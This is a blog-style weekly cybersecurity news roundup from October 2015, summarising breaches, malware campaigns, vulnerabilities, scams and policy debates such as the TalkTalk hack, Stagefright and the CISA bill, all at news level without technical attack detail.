Sunday, October 25, 2015

Issue 35 - Week of Oct 19th

1.       TalkTalk hack hits up to 4 million in unencrypted data theft: UK ISP TalkTalk says customers' credit-card and banking details may have been accessed by hackers after a "sustained cyber-attack" on its website last week. Following its second major breach in the past year, the British broadband provider has vaguely admitted it may have failed to protect customers' financial data properly. Among details it says may have been "accessed" were customers' name, address, date of birth, email address, telephone number, account information, credit-card and bank-account details. TalkTalk customers were targeted by fraudsters earlier this year following a breach of its internal security procedures linked to its use of a third-party call center.

2.       WikiLeaks posts data from CIA director's email account: Last week, Hackers accessed CIA Director's personal AOL email account by using social engineering techniques. One hacker posed as a Verizon worker and called a Verizon worker and tricked him to obtain personal information; with which he reset the Director's password. The hackers were able to access sensitive government documents stored as attachments in the personal account because the spy chief had forwarded them from his work email. In 2012 another CIA director had to step down as he mishandled classified information by allegedly storing it in a Gmail drafts folder, he avoided jail by pleading guilty but was fined $100,000.

3.       Governments  seeks to outlaw Car hacking: A house committee will consider automotive safety reforms that, among other proposed changes, would make it illegal to hack vehicles and will be punishable by penalties up to $100k. A group of researchers argue that hackers make car safer and hence they should not be banned from tinkering. Car Hacking is not just remotely disabling its functionalities - it could also be used for surveillance as well as sabotage. As discussed in the issue of 27th-July - following a demo of hack -  Chrysler had recalled 1.4M Vehicles for Bug Fix while the hackers released a video of their demo.

4.       Just how many websites are vulnerable because of SHA-1: Some certificate authorities are still issuing digital certificates signed with the SHA-1 hashing algorithm, despite recent research showing that the cost of undermining it is not beyond criminals' budgets. Browser makers Google, Microsoft, and Mozilla have announced plans to stop accepting SHA-1 SSL certificates by 2017. But researchers recently called for this deadline to be brought forward, after estimating the cost of causing a SHA-1 collision is much cheaper than initially thought - and definitely within reach of cybercriminal budgets. It is estimated that by renting Amazon servers with an approx. cost of $75K USD, hackers can crack SHA-1 based encryption.

5.       Thousands of e-commerce Magento websites struck with Guruncsite malware: Websites running the Magento Content Management System are being infected with malware in a fresh campaign which has impacted thousands of domains in a matter of days. The attack involves the injection of malicious scripts through iframes from guruincsite.com (Neutrino exploit kit). Google has already blacklisted almost 8,000 infected websites; Removing the malicious scripts then resubmitting clean websites back to Google for review should remove the blacklisting. The Magento content management system, tailored for e-commerce, is used by over 200,000 companies worldwide.

6.       Computer clocks can be easily scrambled, undermining encryption and bitcoin trades: Researchers from Boston University said they've found several flaws in NTP that could undermine encrypted communications and even jam up bitcoin transactions. One of the problems they found is that it's possible for an attacker to cause an organization's servers to stopping checking the time altogether. NTP has a rate-limiting mechanism, nicknamed the "Kiss O' Death" packet, that will stop a computer from repeatedly querying the time in case of a technical problem. When that packet is sent, systems may stop querying the time for days or years, according to a summary of the research. They found a big issue: it's possible for an attacker to spoof a Kiss O' Death packet, making it appear to have come from a system experiencing trouble when it's actually fine.

7.       “I am stranded without any money, so I was wondering if I could get a quick loan of $1,850 from you or any amount, you can afford if not all,” read the mail from the hacked account. Hackers appear to have adopted a new modus operandi to make people transfer money to their accounts. Recently, somebody who is believed to be from Ukraine, hacked a yahoo mail account of a journalist and created similar ID with Microsoft web mail service Outlook. The hacker used contacts from the hacked Yahoo ID to send mails to the person’s friends and relatives asking money from the newly created ID. The mail typically claim that the sender was stuck in a foreign country and his debit and credit cards are not working and is in dire need of money. Since hackers used a different account, the original user didn’t know about the mails sent in his name.

8.     Unbelievably simple scam cost The ONGC ₹197 Crore: Another classic case of typo-squatting. 'patel_dv@ongc.co.in' is an original id of ONGC. Hackers used a parked domain to create a fake id 'patel_dv@ognc.co.in'. Note the simple change in spelling of the fake id. ONGC was engaged in a business transaction with Saudi Arabia-based oil company Aramco. Using their fake id, Hackers began interacting with Aramco and instructed them to make the payment to a Bangkok Bank instead of the regular State Bank of India. A case has been registered with the cybercrime police station.

9.   Cybersecurity skills gap continues to grow: Last week the Digital India Initiative of the Government appointed - an Ethical hacker as its new Brand Ambassador. This in way acknowledges hacking as an acceptable activity, a legitimate career option & an honest way to earn one's livelihood. A deeper look at the colleges and institutes that offer ethical hacking courses show that ethical hacking in India is making large strides, but there is still some distance to cover. Worldwide market indicators show the need for as many as 4.25 million  security professionals by 2017, representing the potential for a 47% shortage in qualified personnel. 


10.   State-sponsored attack? Facebook will now tell you 'You've been hacked': Facebook has started to notify users when it suspects they've been targeted by government-sponsored hackers, rather by than run-of-the-mill cybercriminals. Facebook won't be revealing how it tells when a state-sponsored hacker is targeting a particular user, although there are numerous pieces of known malware that are suspected to have been created by government-backed hackers, such as the Stuxnet, thought to have been built by the US, Duqu, DarkSeoul, supposedly from North Korea, China's ShadyRAT and Russia's The Dukes malware.

Sunday, October 18, 2015

Issue 34 - Week of Oct 12th

1.       Angler Exploit Kit Blasts Daily Mail Visitors Via Malvertising: There has been a lot of buzz about the powerful Angler Exploit Kit in recent days. This time it struck on popular British newspaper the Daily Mail which accounts for 156 million monthly visits. Malvertising works by inserting a malicious advert within a publisher’s website. When the page loads, the ad is displayed and performs its nefarious action without the user having to click on it. In the issue dated Aug 16th - we discussed about Yahoo being misused to launch Malvertising.

2.       Netgear Published Patched Firmware for Routers Under Attack: After a pair of very public disclosures in the last two weeks, Netgear published new firmware for vulnerabilities in its routers that have been publicly exploited. Researchers discovered as many as 10,000 routers had been taken over. The risk to business and home users is that an attacker in control of a router can redirect incoming and outgoing traffic by changing DNS configurations, or sit in a man-in-the-middle position and spy on supposedly protected traffic. This type of attack is called pharming attack.

3.       All Flash versions vulnerable to remote control attack until next week: Adobe has announced it is currently working on a new update for Flash to fix a critical vulnerability that is currently being exploited. All current versions of Flash are vulnerable to the exploit that could allow an attacker to take control of the affected machine. Earlier this year, Facebook's CISO had called for Flash to be killed off. Almost every week, a new flaw is found and patched by Adobe and in some cases Flash been the basis for advanced persistent threats targeting major industries.

4.       Wealth of personal data found on used electronics purchased online: Varying amounts and types of residual data have been found on used mobile devices, hard disk drives and solid state drives purchased online from Amazon, eBay and Gazelle.com. Based on an examination of 122 pieces of second-hand equipment, 48 percent of the hard disk drives and solid state drives contained residual data, while thousands of leftover emails, call logs, texts/SMS/IMs, photos and videos were retrieved from 35 percent of the mobile devices. Most people attempt in some way or another to delete their data from electronic equipment. But while those deletion methods are common and seem reliable, they aren't always effective at removing data permanently.

5.       After spike in Windows infections, Microsoft steps in to tackle TeslaCrypt ransomware: Microsoft has released a rescue tool for thousands of Windows machines that were infected in August by file-encrypting ransomware TeslaCrypt. Along with last week's 'Patch Tuesday' updates, Microsoft upgraded its malicious software removal tool to tackle TeslaCrypt. TeslaCrypt appeared on the radar in early 2015, gaining notoriety for targeting gamers. After an infection, TeslaCrypt searches for specific file types and then encrypts them with AES 256 encryption and demands payment in Bitcoin in exchange for a key to unlock the files.

6.       Google, Facebook and peers criticize CISA bill ahead of Senate consideration: A trade group representing Facebook, Google, Yahoo and other tech and communications companies has come down heavily against CISA - Cybersecurity Information Sharing Act of 2015, a controversial bill in the U.S. that is intended to encourage businesses to share information about cyber-threats with the government. Critics of the bill are concerned that the provisions of the bill could be used by companies to hand over customers’ personal data to government intelligence agencies such as the National Security Agency. Cyber-threat information-sharing may not have prevented several recent attacks on government agencies, according to experts.

7.       US says no to encryption law - for now: The US government has decided not to call for new legislation to force tech companies to decode the encrypted communications of their customers - for now at least. With more traditional methods of communication there is usually a way for the service provider to allow police - with a warrant - access to the data. But end-to-end encryption means the only place the message is unscrambled is on the smartphone itself. A FBI Director said the issue with encryption was a clash between the need for safety and security on the internet and public safety. "Those two values we hold dear are crashing into each other. I don't know what the answer is," he said.

8.       The government of Uganda used sophisticated surveillance technology: This was used to target opposition members, journalists, and activists, according to an investigation from a London-based watchdog. The government's weapon of choice was a highly invasive form of spyware called FinFisher, which is capable of remotely monitoring computers, smartphones, and other equipment in real-time, and has been sold on the open market to repressive governments.

9.       A shadowy Russian teenager has emerged as the new threat to Indian banks: He's said to hack ATMs using 'Tyupkin' - a virus that has the sinister power to force cash machines into maintenance mode and spew out currency notes. The modus operandi involves plugging in a USB drive or rebooting the ATM after taking off the side or back panel of an ATM. Once infected, a few simple keystrokes cause the cash to flow out. An ethical hacker showed that attackers can infiltrate banks, go behind the firewalls and move around from one ATM to another. He showed that the hackers can use Powershell, which none of the bank systems can detect. Powershell is a way to write malware that is not traced by the current systems and antivirus tools. It just looks like a plain text file, not like malware, but it has the full capabilities of malware.

10.   Recently researchers discovered a new Facebook post being shared that was offering an iPhone 6S for only £1. Targets of this scam will typically see a Facebook post that has been shared by their friends and other victims of the scam. Clicking on the post ends up redirecting to a fake news article on igadgete[.]com. The news article claims that a "trusted distribution partner" of Apple named "FunkyClock" is giving away iPhone 6S phones for £1 as part of a new promotion. Always be aware of an offer that seems too good to be true, because it almost certainly always is fake. If in doubt, Raytheon | Websense suggests the following: Never enter your card details into websites that you do not know or trust and If something doesn't feel right, stop what you're doing and seek help.

Sunday, October 11, 2015

Issue 33 - Week of Oct 5th

1.       Suspected cyberespionage - Uber checks connections between hacker and Lyft:  Uber and Lyft are fierce competitors with hugely different valuations. Uber is valued at $51 billion while Lyft is at $2.5 billion. Uber was hacked 8 months ago and 50,000 records of drivers' names and license numbers was stolen, now uber is focusing its legal efforts on identifying the hacker, which according to sources can be traced to the CTO of Lyft.

2.       Suspected Iran-based hacker group creates network of fake LinkedIn profiles: Researchers uncovered a network of fake LinkedIn profiles, these convincing profiles form a self-referenced network of seemingly established LinkedIn users. Researchers believe the purpose of this network is to target potential victims through social engineering. Most of the legitimate LinkedIn accounts associated with the fake accounts belong to individuals in the Middle East, who could have been the potential victims. The level of detail in the profiles suggests that the threat actors invested substantial time and effort into creating and maintaining these personas. The photos used in the fake accounts are likely of innocent individuals who have no connection with the hacker group.

3.       Scottrade suffers hack; 4.6M customers notified of breach: The brokerage firm confirmed the attack, but said the focus of the attack was client contact details rather than financial information. Although Social Security numbers, email addresses and other sensitive data were contained in the system that were accessed, it appears that contact information was the focus of the incident -  the company statement read.

4.       HTC says monthly Android security updates are unrealistic: The recent Stagefright vulnerability that could affect every Android device may have been a blessing in disguise for Android users. Responding to the situation, Google announced monthly security update availability for its Nexus phones. Samsung also committed to ‘near monthly’ updates and LG has followed suit. However HTC, has not. The company said it will push for them, but unrealistic for anyone to say guaranteed updates every month. The Android eco-system (Google, Hardware maker and Telcos) will have to sooner or later put together regular updates to keep pace with modern day security.

5.       Cost of cybercrimes climbs to $6.8m per firm in Japan, $3.4m in Australia: The average cost of cybercrime per organization a year across seven countries (Japan, Australia, Germany, Brazil, US, UK, and Russian) has increased to $7.7 million in 2015, with companies taking 46 days to resolve a cyber-attack. According to a study, the average annualized cost of cybercrimes in Japan - climbed 14 percent to an estimated $6.81 million. In Australia, this figure increased 13 percent to $3.47 million, revealed the annual study. As organizations increasingly invest in new technologies like mobile, cloud, and the Internet of Things, the attack surface for more sophisticated adversaries continues to expand.

6.       Report finds many nuclear power plant systems 'insecure by design': A study of the information security measures at civilian nuclear energy facilities around the world found a wide range of problems at many facilities that could leave them vulnerable to attacks on industrial control systems-potentially causing interruptions in electrical power or even damage to the reactors themselves. The study found that many nuclear power plants' systems were "insecure by design" and vulnerable to attacks that could have wide-ranging impacts in the physical world-including the disruption of the electrical power grid and the release of "significant quantities of ionizing radiation.

7.       Samsung says customer payment data not affected by hack attack: LoopPay (a mobile-payments technology startup), which Samsung acquired in February to set up its payment system, was hit by a hacking incident. Samsung has said that customers who use the payments system weren't hurt by the hack attack. A government-affiliated Chinese hacker group known as the Codoso Group or Sunshock Group was responsible for the attack, The New York Times said. LoopPay believes the hackers were trying to steal the company's magnetic strip technology -- the primary reason Samsung bought the company.

8.       Who is responsible for a driverless car accident? Tech firm Google, Mercedes & Volvo say they will accept full liability for accidents involving its driverless cars as in this case the manufacturer of the technology is the driver. However, they would only accept liability for an accident if it was the result of a flaw in the car's design. If the customer used the technology in an inappropriate way then the user will be liable and if a third party vehicle causes the crash, then it would be liable. The critical question would be who would be responsible when a crash is due to a cyber-attack?

9.     Cybersecurity skills gap continues to grow: Frenzied activity in the Indian internet space, especially the mushrooming of start-ups, has brought the shortage of ethical hackers once again to the fore. The industry estimates the availability of ethical hackers at a meagre 15,000-17,000, much in contrast against the 50,000-70,000 cyber security professionals needed per year. An ethical hacker is a computer expert who hacks into a network to test or evaluate the vulnerabilities, but without malicious intentions. Industry estimates that by 2020 the annual requirement would shoot to about 1 million cyber security professionals.


10.   Chinese hackers have been tracked to use the seven stage kill chain: They 'Recon' their victims by using the Watering Hole Attacks - wherein they track their victims online activity and the websites the victims visit. Once a list of often-visited websites has been collected, the cyber-attacker will place  a code (like adware) in these trusted websites and redirect the users to malicious sites from where the visitors are served an exploit kit in order to achieve the true goal -- compromising a victim's system. Once inside a targeted network, the hackers tended to go for the domain controller in order to steal various credentials and gain access to other network areas which may store sensitive data.


Sunday, October 4, 2015

Issue 32 - Week of Sep 28th

1.       Experian leaks info of 15 million T-Mobile credit applications: Experian is one of the major credit rating bureaus that companies use to conduct credit checks, has exposed the personal information of T-Mobile consumers. T-Mobile has revealed that the hack has exposed the personal details, including social security numbers, date of birth, and various identification numbers - including passport & driver's license number of its customers. Experian said the incident is "isolated" and is only limited to consumers who applied for T-Mobile USA services between Sept. 1, 2013, and Sept. 16, 2015.

2.       T-Mobile CEO - John Legere did what all CEOs should do after a hack: Promptly following the issuance of the company statement - Legere got on Twitter and sent out a tweet that read, “One of our vendors, Experian, experiences a data breach. See what we’re doing about it,” and included a link to the company’s initial announcement. But Legere’s engagement didn’t stop there. He then proceeded to answer questions from T-Mobile customers in response to his Tweet. These tweets address what everyone potentially affected by a massive data breach yearns for—answers, personal interaction and attention. The best thing a company can do after an attack is act like they care. Seeing a CEO of a giant corporation get on social media and interact with customers is certainly refreshing and the way to go.

3.       Every Android device is vulnerable to newly discovered bugs: With two new "Stagefright" vulnerabilities discovered, almost every Android device ever released is vulnerable to malicious hackers. More than a billion Android smartphones and tablets are at risk of being compromised by the new bugs if their owners even just preview video or audio files that have been specially crafted to exploit the vulnerability. Google has responded positively and will release a patch for these vulnerabilities by Oct 5th but the question on Android ecosystem remain wherein the processes for updates is very slow as phone makers are responsible for pushing software updates to customers.

4.       A researcher has discovered a flaw in the Apple’s Gatekeeper: Gatekeeper is a new feature in Apple build to help protect the device from malware and misbehaving apps downloaded from the Internet. A signed app can access other software or components that have been replaced with malware without a separate verification stage. In his testing, the researcher found that a signed Photoshop installer would load plug-ins from another directory that were changed out for malware without any further notification. He also tested with an Apple-distributed program that he declined to disclose at Apple’s request.

5.       Critical WinRAR vulnerability places 500 million users at risk: An unpatched, critical remote code execution flaw within WinRAR's SFX archive features has been disclosed by a researcher; a security flaw which reportedly allows for remote code execution has been discovered in WinRAR SFX version 5.21. A researcher posted his findings on Full Disclosure. Granted a CVSS score of 7.4, the vulnerability could allow hackers to remotely execute system code and compromise victim machines, leading to control, surveillance and potentially data theft. WinRar's team refutes the flaw discovery.

6.       Russian Developer of the Notorious "Citadel" Malware Sentenced to Prison: "Dimitry Belorossov, a.k.a Rainerfox, has been sentenced to four years, six months in prison following his guilty plea for conspiring to commit computer fraud. Belorossov distributed and installed Citadel, a sophisticated malware that infected over 11 million computers worldwide, onto victim computers using a variety of infection methods including malicious attachments to spam emails and commercial Internet ads containing malware or links to malware. Citadel was a sophisticated form of malware known as a "banking Trojan" designed to steal online banking credentials, credit card information, personally identifiable information, and, ultimately, funds through unauthorized electronic transfers. Belorossov was arrested in Spain and extradited to US.

7.       Cookies can facilitate attacks on secure web sites: CERT has issued a new directive notifying that cookies can be used to allow remote attackers to bypass a secure protocol (HTTPS) and reveal private session information - and that modern browsers, including Apple's Safari, Mozilla's Firefox and Google's Chrome, currently provide no protection against the attack vector. Research indicates that secure sites as important as Google and the Bank of America are vulnerable to the technique. CERT advises that HSTS (HTTP Strict Transport Security) be implemented at the server level in order to mitigate the vulnerability. But even with that done, it remains for browser publishers to prevent subdomains from being used by attackers to generate malicious cookies.

8.       As impactful as targeted attacks can be on organizations, non-targeted automated attacks using known vulnerabilities also pose a significant threat to the enterprise: It is found that it takes an average of between 100 to 120 days to patch a flaw once it's found. Meanwhile, the probability of a vulnerability being exploited rises to 90 percent by the time the flaw has been known for between 40 to 60 days. It's no surprise, then, that the volume of exploits has exploded in 2015.

9.       Classic case of Typosquatting: Mumbai cyber police arrested a school drop-out and a graphic designer for creating a fake BMC Octroi (Local tax) collection website. The website was in operation from January till April before the accused pulled it down on seeing an article in a local newspaper that the BMC had detected the fraud. The accused created the fake website (www.mcgmoctroi.in), similar to that of the BMC (www.mcgmoctroi.com), with minor changes. Police are collecting information on number of e-receipts (called PNR) the accused issued to transport companies and total money he managed to siphon off. The accused have been booked under several sections of the IPC and the IT Act for cheating and forgery.


10.   In response to the cyber-attack on the Kerala government website by Pakistan-based hackers, an anonymous Indian cyber group has retaliated by hacking into scores of official Pakistani websites. Last week - the Kerala government website was crashed by Pakistani hackers, who posted image of a burning Indian flag. The hackers had left messages such as "Pakistan Zindabad", "We are Team Pak Cyber Attacker" and "Security is just an illusion". However, hours later, the Kerala-based 'Mallu Cyber Soldiers' hacked into Pak government websites, warning the pro-Pakistan hackers to "stay away from Indian cyber space". Just like the world-famous Anonymous hacktivists, "Mallu Cyber Soldiers" is also an online gathering of security experts. These vigilantes work toward protecting Indian websites from getting hacked.